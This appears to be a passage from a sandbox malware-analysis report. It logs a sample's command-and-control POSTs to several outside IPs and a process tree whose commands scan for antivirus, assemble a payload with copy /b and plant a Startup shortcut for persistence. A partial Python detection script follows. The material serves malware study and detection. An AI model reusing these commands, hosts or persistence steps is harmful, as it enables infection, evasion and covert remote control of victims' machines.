                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
Nov 29, 2024 16:25:26.907893896 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
Content-Type: text/plain; charset=utf-8
X-Content-Type-Options: nosniff
Date: Fri, 29 Nov 2024 15:25:26 GMT
Content-Length: 18
Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
Data Ascii: Too many requests


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.64972793.185.159.253802404C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:27.031255007 CET  300                OUT        POST / HTTP/1.1
                                                                          Host: 93.185.159.253
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: hUf1Jxxo
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          8           192.168.2.6  49728        91.212.166.91    80                2404  C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:37.031603098 CET  299                OUT        POST / HTTP/1.1
                                                                          Host: 91.212.166.91
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: t6Fn0m7U
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          9           192.168.2.6  49729        188.130.206.243  80                2404  C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:37.274530888 CET  301                OUT        POST / HTTP/1.1
                                                                          Host: 188.130.206.243
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: 15nJuxzx
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:39.397080898 CET  555                IN         HTTP/1.1 200 OK
                                                                          Date: Fri, 29 Nov 2024 15:25:39 GMT
                                                                          Content-Length: 437
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Data Raw: 31 30 39 2e 31 37 32 2e 38 37 2e 31 33 35 3b 32 32 30 31 36 3b 68 41 67 41 74 53 69 72 74 74 6b 45 70 33 78 4e 3a 47 4c 43 2f 77 53 35 2f 67 42 56 34 58 43 63 36 72 6a 57 2e 6d 77 65 38 35 4e 48 2e 7a 54 79 32 62 33 4f 33 6a 4f 69 32 6f 74 41 2e 32 35 74 31 34 44 53 30 5a 65 48 36 59 63 4c 2c 72 41 67 68 63 6f 44 74 45 47 6b 74 6c 6e 54 70 4b 61 70 3a 61 6a 39 2f 37 6b 45 2f 41 42 39 34 39 6d 53 36 48 35 79 2e 4d 52 4b 38 6c 6d 49 2e 46 34 6e 32 35 77 73 33 33 4e 31 36 48 6e 69 2e 49 36 36 36 50 46 61 31 78 54 4b 2c 4f 35 59 68 68 57 38 74 54 62 79 74 72 33 78 70 55 6c 32 3a 6f 75 58 2f 47 46 4f 2f 71 39 32 39 37 35 4e 31 4a 75 69 2e 34 39 53 32 6a 53 4c 31 65 31 44 32 4e 4d 42 2e 58 71 53 31 55 54 4d 36 49 50 34 36 63 70 34 2e 67 6a 33 39 47 34 77 31 44 34 75 2c 68 4a 37 68 7a 35 62 74 46 78 4e 74 69 68 44 70 33 44 48 3a 51 54 38 2f 77 49 34 2f 70 41 41 31 49 63 44 38 72 4f 75 38 78 6b 4e 2e 69 49 7a 31 78 49 65 33 43 54 61 30 44 47 78 2e 45 53 41 32 74 36 59 30 57 51 54 36 38 32 62 2e 47 32 6b 32 [TRUNCATED]
                                                                          Data Ascii: 109.172.87.135;22016;hAgAtSirttkEp3xN:GLC/wS5/gBV4XCc6rjW.mwe85NH.zTy2b3O3jOi2otA.25t14DS0ZeH6YcL,rAghcoDtEGktlnTpKap:aj9/7kE/AB949mS6H5y.MRK8lmI.F4n25ws33N16Hni.I666PFa1xTK,O5YhhW8tTbytr3xpUl2:ouX/GFO/q92975N1Jui.49S2jSL1e1D2NMB.XqS1UTM6IP46cp4.gj39G4w1D4u,hJ7hz5btFxNtihDp3DH:QT8/wI4/pAA1IcD8rOu8xkN.iIz1xIe3CTa0DGx.ESA2t6Y0WQT682b.G2k2Vng4duD3AKA,wZQh7Rlt9fltzXapOte:Ux8/FdR/nSG3M1W8euM.ALe1A0I8T3L0b7Q.ZQU2zU70GZu5orS.AuX1PPJ6yjV4cR0
                                                                          Nov 29, 2024 16:26:09.399477959 CET  6                  OUT        Data Raw: 00
                                                                          Data Ascii:


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          10          192.168.2.6  49731        46.8.232.106     80                1292  C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:42.503551960 CET  298                OUT        POST / HTTP/1.1
                                                                          Host: 46.8.232.106
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: dHf840aa
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:43.858613968 CET  183                IN         HTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:43 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          11          192.168.2.6  49732        46.8.236.61      80                1292  C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:43.992676973 CET  297                OUT        POST / HTTP/1.1
                                                                          Host: 46.8.236.61
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: 3y3dW444
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:45.635513067 CET  183                IN         HTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:45 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          12          192.168.2.6  49733        93.185.159.253   80                1292  C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:45.761244059 CET  300                OUT        POST / HTTP/1.1
                                                                          Host: 93.185.159.253
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: DGz9MaA3
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          13          192.168.2.6  49734        91.212.166.91    80                1292  C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:55.773204088 CET  299                OUT        POST / HTTP/1.1
                                                                          Host: 91.212.166.91
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: fgwiPh0v
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
                                                                          Nov 29, 2024 16:25:57.154066086 CET  183                IN         HTTP/1.1 429 Too Many Requests
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Fri, 29 Nov 2024 15:25:56 GMT
                                                                          Content-Length: 18
                                                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                                                          Data Ascii: Too many requests


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          14          192.168.2.6  49735        188.130.206.243  80                1292  C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 29, 2024 16:25:57.339792967 CET  301                OUT        POST / HTTP/1.1
                                                                          Host: 188.130.206.243
                                                                          User-Agent: Go-http-client/1.1
                                                                          Content-Length: 162
                                                                          X-Api-Key: LagWi7gG
                                                                          Accept-Encoding: gzip
                                                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a
                                                                          Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK


                                                                          Target ID:0
                                                                          Start time:10:24:04
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\Desktop\InsertSr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\InsertSr.exe"
                                                                          Imagebase:0x400000
                                                                          File size:45'088'780 bytes
                                                                          MD5 hash:C4C26460F0F0FC5F6ACB5A9DCA7D251C
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Cricket Cricket.bat & Cricket.bat
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:10:24:07
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /I "wrsa opssvc"
                                                                          Imagebase:0xbc0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:tasklist
                                                                          Imagebase:0x9f0000
                                                                          File size:79'360 bytes
                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                          Imagebase:0xbc0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c md 316094
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:findstr /V "SequenceOctoberContributionRef" Recreation
                                                                          Imagebase:0xbc0000
                                                                          File size:29'696 bytes
                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:10:24:08
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:10:24:09
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:Intranet.pif u
                                                                          Imagebase:0x4a0000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:10:24:09
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:choice /d y /t 5
                                                                          Imagebase:0x950000
                                                                          File size:28'160 bytes
                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:10:24:10
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit
                                                                          Imagebase:0x1c0000
                                                                          File size:236'544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:10:24:10
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:16
                                                                          Start time:10:24:22
                                                                          Start date:29/11/2024
                                                                          Path:C:\Windows\System32\wscript.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.js"
                                                                          Imagebase:0x7ff6989e0000
                                                                          File size:170'496 bytes
                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:10:24:22
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr" "C:\Users\user\AppData\Local\Immersive Creations Co\D"
                                                                          Imagebase:0x180000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 8%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:10:24:48
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\316094\Intranet.pif
                                                                          Imagebase:0x4a0000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false

                                                                          Target ID:22
                                                                          Start time:10:25:06
                                                                          Start date:29/11/2024
                                                                          Path:C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scr"
                                                                          Imagebase:0x180000
                                                                          File size:893'608 bytes
                                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:false
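
The process records above (Target IDs 9 through 17) document a staged loader: findstr /V strips a marker line out of a dropped file, cmd /c copy /b glues ten fragments into a file named u, Intranet.pif is launched with u as its argument, choice /d y /t 5 serves as a five-second pause, and a .url shortcut pointing at Virtuoso.js is echoed into the Startup folder, after which WScript executes that file and Virtuoso.scr starts in the same second. The Python below is an added detection example and is not part of the Joe Sandbox report or of the sample: it re-creates those command lines as constructed records and runs rule predicates over them in the spirit of the Sigma hits listed at the top of the report. The rule names, the ProcessEvent layout and the user-writable-directory heuristic are assumptions made for this example.

```python
# Added example (not from the Joe Sandbox report or the sample): rule-based detection
# over constructed process records copied from the report's process tree.
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    target_id: int  # Joe Sandbox "Target ID"; used here only to order events
    image: str
    cmdline: str


# Constructed records: image paths and command lines copied from Target IDs 9-17 above.
EVENTS = [
    ProcessEvent(9, r"C:\Windows\SysWOW64\findstr.exe",
                 'findstr /V "SequenceOctoberContributionRef" Recreation'),
    ProcessEvent(10, r"C:\Windows\SysWOW64\cmd.exe",
                 r"cmd /c copy /b ..\Metres + ..\Scientists + ..\Prep + ..\Responsible + ..\Stranger"
                 r" + ..\Components + ..\Medium + ..\Ima + ..\My + ..\Indiana u"),
    ProcessEvent(11, r"C:\Users\user\AppData\Local\Temp\316094\Intranet.pif", "Intranet.pif u"),
    ProcessEvent(12, r"C:\Windows\SysWOW64\choice.exe", "choice /d y /t 5"),
    ProcessEvent(13, r"C:\Windows\SysWOW64\cmd.exe",
                 r'cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows'
                 r'\Start Menu\Programs\Startup\Virtuoso.url" & echo URL="C:\Users\user\AppData\Local'
                 r'\Immersive Creations Co\Virtuoso.js" >> "C:\Users\user\AppData\Roaming\Microsoft'
                 r'\Windows\Start Menu\Programs\Startup\Virtuoso.url" & exit'),
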